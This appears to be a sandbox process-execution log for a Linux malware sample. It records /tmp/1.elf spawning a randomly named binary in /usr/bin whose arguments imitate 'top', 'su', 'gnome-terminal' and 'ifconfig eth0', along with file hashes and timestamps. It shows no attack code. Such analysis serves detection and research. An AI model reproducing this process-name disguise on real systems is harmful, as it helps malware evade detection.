                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:/usr/bin/lkpssqmflq top 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:/usr/bin/lkpssqmflq top 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:/usr/bin/lkpssqmflq su 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:/usr/bin/lkpssqmflq gnome-terminal 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:/usr/bin/lkpssqmflq "ifconfig eth0" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:32:48
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkpssqmflq
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:e3edc5b700334c5fb57de877def5e6a9

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:1620224 bytes
                                                                                                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                                                                    File size:22760 bytes
                                                                                                                                                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e